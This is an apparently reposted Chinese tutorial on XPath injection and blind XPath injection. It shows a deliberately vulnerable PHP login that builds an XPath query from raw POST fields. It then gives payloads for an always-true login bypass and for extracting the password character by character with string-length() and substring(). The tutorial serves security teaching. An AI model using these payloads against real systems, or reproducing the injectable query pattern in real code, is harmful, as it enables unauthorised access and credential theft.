php xpath注入工具,[原创]WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入

WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入

1、什么是xpath注入

XPath是一种查询语言,它描述了如何在XML文档中查找特定元素(包括属性、处理指令等)。既然是一种查询语言,XPath在一些方面与SQL相似,不过,XPath的不同之处在于它可以用来引用XML文档的几乎任何部分,而不受访问控制限制。在SQL中,一个“用户”(在XPath/XML上下文中未定义的术语)的权限被限制在一个特定的数据库,表,列或者行。使用XPath注入攻击,攻击者可以修改

XPath查询语句来执行所选择的操作

XPath盲注攻击可以从一个使用不安全方式嵌入用户信息的应用中提取数据。在输入未被过滤的情况下,攻击者可以提交并执行有效的XPath代码。这种类型的攻击适用于以下情况:攻击者不清楚XML文档的架构,或者错误消息被抑制,一次只能通过布尔化查询来获取部分信息,就像SQL盲注一样。

2、案例

xpath_user.xml 文件

漏洞测试文件

用户名:

密码:

if(file_exists('xpath_user.xml')){

$xml=simplexml_load_file('xpath_user.xml');

if($_POST['submit']){

$username=$_POST['username'];

$password=$_POST['password'];

$sql="//user[@username='{$username}' and @password='{$password}']";

$resulit = $xml->xpath($sql);

if(count($resulit)==0){

echo '登录失败';

}else{

echo "登录成功";

}

}

}

?>

$sql="//user[@username='{$username}' and @password='{$password}']";

select * from users where username=’username’ and password=’password’

4、注入方法

万能密码登录

admin’

or ‘1’=’1

username=admin’ or ‘1’=’1 &password=xxxxxxxxxxx&submit=submit

lazy.png

5、盲注入

string-length()获取字符长度

substring

截取字符

username=admin’and

string-length(@password)=5 or ‘1’=’1&password=0&submit=submit

返回正确是就等于登录成功

username=admin’and substring(@password,1,1)=’a’ or ‘1’=’1&password=0&submit=submit

lazy.png

先获取第一个字符 再获取第二个。admin

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/374

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值